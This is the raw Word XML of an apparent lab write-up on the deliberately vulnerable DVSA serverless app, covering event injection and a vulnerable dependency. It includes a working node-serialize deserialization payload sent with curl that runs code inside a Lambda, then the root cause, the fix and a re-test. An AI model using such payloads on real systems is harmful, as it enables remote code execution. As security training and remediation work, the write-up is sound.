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F9C0" w14:textId="77777777" w:rsidR="000E2EA5" w:rsidRPr="009B6FC5" w:rsidRDefault="000E2EA5" w:rsidP="00AA2209">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Lesson #1 and Lesson #9: Event Injection and Vulnerable Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE7E1B6" w14:textId="77777777" w:rsidR="00EF5725" w:rsidRPr="009B6FC5" w:rsidRDefault="00EF5725" w:rsidP="00EF5725">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Part 1) Goal and Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CAE69F" w14:textId="77777777" w:rsidR="00EF5725" w:rsidRPr="009B6FC5" w:rsidRDefault="00EF5725" w:rsidP="00EF5725">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>This part covers Lesson #1: Event Injection and Lesson #9: Vulnerable Dependencies. The main affected parts are API Gateway and the backend Lambda function. The security impact is remote code execution, which means attacker input can run code inside Lambda. The main weakness is unsafe deserialization and a vulnerable third-party package that treats user input like code instead of normal data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1C3165" w14:textId="77777777" w:rsidR="000065F6" w:rsidRPr="009B6FC5" w:rsidRDefault="000065F6" w:rsidP="000065F6">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Part 2) Why This Works / Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539FA078" w14:textId="77777777" w:rsidR="000065F6" w:rsidRPr="009B6FC5" w:rsidRDefault="000065F6" w:rsidP="000065F6">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>This attack works because the backend uses unsafe deserialization on attacker-controlled input. A vulnerable Node.js package accepts serialized functions, so the payload is treated like code and runs during deserialization. In short, the app trusts unsafe input, and an unsafe dependency helps the attack succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423027A" w14:textId="77777777" w:rsidR="004A257A" w:rsidRPr="009B6FC5" w:rsidRDefault="004A257A" w:rsidP="004A257A">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Part 3) Environment and Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E22EB99" w14:textId="77777777" w:rsidR="004A257A" w:rsidRPr="009B6FC5" w:rsidRDefault="004A257A" w:rsidP="004A257A">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>The test was done on my own DVSA deployment in a non-production AWS account in us-east-1. The API endpoint used was https://0bfhd583wc.execute-api.us-east-1.amazonaws.com/dvsa/order. The main AWS services used were API Gateway, Lambda, and CloudWatch Logs. The log group used for proof was /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>/lambda/DVSA-ORDER-MANAGER. The tools used were AWS Console, WSL terminal, and curl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BD6A43" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Part 4) Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA2424A" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Open the AWS Console and go to API Gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D5E254" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Find the DVSA API stage and copy the order endpoint:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B6FC5">
        <w:br/>
        <w:t>https://0bfhd583wc.execute-api.us-east-1.amazonaws.com/dvsa/order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C589B5C" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Open CloudWatch Logs and make sure the log group /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>/lambda/DVSA-ORDER-MANAGER exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4D195F" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Open the WSL terminal and set the API URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED34295" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>export API="https://0bfhd583wc.execute-api.us-east-1.amazonaws.com/dvsa/order"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AE055A" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Send the crafted POST request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14102284" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>curl -X POST "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A08ED1B" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">  -H "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D05C4" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">  -d '{"action":"_$$ND_FUNC$$_function(){ var fs = require(\"fs\"); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>fs.writeFileSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>(\"/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">/pwned.txt\",\"You are reading the contents of my hacked file!\"); var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>fileData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>fs.readFileSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>(\"/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">/pwned.txt\",\"utf-8\"); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>console.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">(\"FILE READ SUCCESS: \" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>fileData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>); }()","cart-id":""}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E530BB0" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>After sending the request, go back to CloudWatch Logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F456D2" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Open the latest log stream in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>/lambda/DVSA-ORDER-MANAGER.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B3A81C" w14:textId="77777777" w:rsidR="00A66AA2" w:rsidRPr="009B6FC5" w:rsidRDefault="00A66AA2" w:rsidP="00A66AA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Check for the log message:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B6FC5">
        <w:br/>
        <w:t>FILE READ SUCCESS: You are reading the contents of my hacked file!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63520356" w14:textId="60BA30B1" w:rsidR="00F34140" w:rsidRPr="009B6FC5" w:rsidRDefault="00F34140" w:rsidP="00F34140">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:lastRenderedPageBreak/>
        <w:t>Part 5) Evidence and Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3392D0" w14:textId="77777777" w:rsidR="00332928" w:rsidRPr="009B6FC5" w:rsidRDefault="00D625B9" w:rsidP="00D625B9">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58DC2EBD" wp14:editId="2CF9DC66">
            <wp:extent cx="5274310" cy="2178050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="149401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0512" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2178050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3CC9D0" w14:textId="77777777" w:rsidR="00332928" w:rsidRPr="009B6FC5" w:rsidRDefault="00D625B9" w:rsidP="00332928">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C2D288E" wp14:editId="3B2CCBE3">
            <wp:extent cx="5274310" cy="668020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4997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38395" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="668020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA5AA9B" w14:textId="3929AFA6" w:rsidR="00332928" w:rsidRPr="009B6FC5" w:rsidRDefault="00D625B9" w:rsidP="00332928">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78129CBE" wp14:editId="7DF1A11A">
            <wp:extent cx="5274310" cy="462280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="36178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87859" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="462280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17500842" w14:textId="253DD6D2" w:rsidR="00B17B64" w:rsidRPr="009B6FC5" w:rsidRDefault="00D625B9" w:rsidP="00D625B9">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">The vulnerability was confirmed by the CloudWatch log message FILE READ SUCCESS: You are reading the contents of my hacked </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>file!.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> This shows that the injected JavaScript code executed inside the backend Lambda function. The payload wrote a file in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">, read it back, and printed its contents </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> the log. Even though the API returned an internal server error, the backend code had already run successfully. This proves the event injection issue </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> shows the risk of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>the vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709A1067" w14:textId="77777777" w:rsidR="000772F1" w:rsidRPr="009B6FC5" w:rsidRDefault="000772F1" w:rsidP="000772F1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Part 6) Fix Strategy / Probable Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1587FA" w14:textId="77777777" w:rsidR="00082DA8" w:rsidRPr="009B6FC5" w:rsidRDefault="00082DA8" w:rsidP="00082DA8">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">The fix belongs </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> the backend Lambda function that handles the order API request. The main security improvement is to remove unsafe deserialization from the request path, parse the body safely as JSON, and validate required input before processing it. This addresses the root cause because attacker input is no longer treated as executable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088DA4D7" w14:textId="3AC2CBE9" w:rsidR="008A564F" w:rsidRPr="009B6FC5" w:rsidRDefault="008A564F" w:rsidP="00082DA8">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Part 7) Code / Config Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC6839A" w14:textId="0A746F53" w:rsidR="008A564F" w:rsidRPr="009B6FC5" w:rsidRDefault="008A564F" w:rsidP="008A564F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">I changed the Lambda function DVSA-ORDER-MANAGER in order-manager.js. First, I replaced unsafe deserialization with safe parsing by changing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>serialize.unserialize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>event.body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">) to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>JSON.parse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>event.body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>|| "{}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">") and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>serialize.unserialize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>event.headers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">) to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>event.headers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> || {}. Then I added a check for a missing authorization header before splitting the token. If the header is missing, the function now </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>returns {"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>status":"err","message":"Missing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> authorization </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>header"}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> instead of continuing. This removed the unsafe logic that treated attacker input as code and added safer input handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DC3D15" w14:textId="30E5B7DA" w:rsidR="001A6C05" w:rsidRPr="009B6FC5" w:rsidRDefault="001A6C05" w:rsidP="001A6C05">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Code before:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32366A4D" w14:textId="46A500C9" w:rsidR="00C517FF" w:rsidRPr="009B6FC5" w:rsidRDefault="003537A0" w:rsidP="00C517FF">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="431BF437" wp14:editId="0B4FE946">
            <wp:extent cx="5274310" cy="2882900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3964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8911" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2882900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4F5F38" w14:textId="353BD14F" w:rsidR="008A564F" w:rsidRPr="009B6FC5" w:rsidRDefault="001A6C05" w:rsidP="008A564F">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>After:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2F33F8" w14:textId="3D270D4C" w:rsidR="00F735DC" w:rsidRPr="009B6FC5" w:rsidRDefault="00BB5258" w:rsidP="00BB5258">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BF244D6" wp14:editId="702EE143">
            <wp:extent cx="5274310" cy="2418080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="160407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74053" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2418080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="162877DE" w14:textId="77777777" w:rsidR="00BB5258" w:rsidRPr="009B6FC5" w:rsidRDefault="00BB5258" w:rsidP="00BB5258">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010DF68F" w14:textId="77777777" w:rsidR="00F735DC" w:rsidRPr="009B6FC5" w:rsidRDefault="00F735DC" w:rsidP="00F735DC">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Part 8) Verification After Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB86C19" w14:textId="77777777" w:rsidR="00F735DC" w:rsidRPr="009B6FC5" w:rsidRDefault="00F735DC" w:rsidP="00F735DC">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve">After the fix, I ran the same crafted curl request again. This time, the API </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>returned {"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>status":"err","message":"Missing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> authorization </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>header"}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t xml:space="preserve"> instead of crashing. I then checked the newest CloudWatch log stream in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>/lambda/DVSA-ORDER-MANAGER, and the message FILE READ SUCCESS: You are reading the contents of my hacked file! did not appear. This shows that the injected code no longer executed and the vulnerability was fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B005A83" w14:textId="439AA9AE" w:rsidR="00332928" w:rsidRPr="009B6FC5" w:rsidRDefault="00F735DC" w:rsidP="00332928">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40DA6BC4" wp14:editId="62523230">
            <wp:extent cx="5274310" cy="671195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="179359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6174" name=""/>
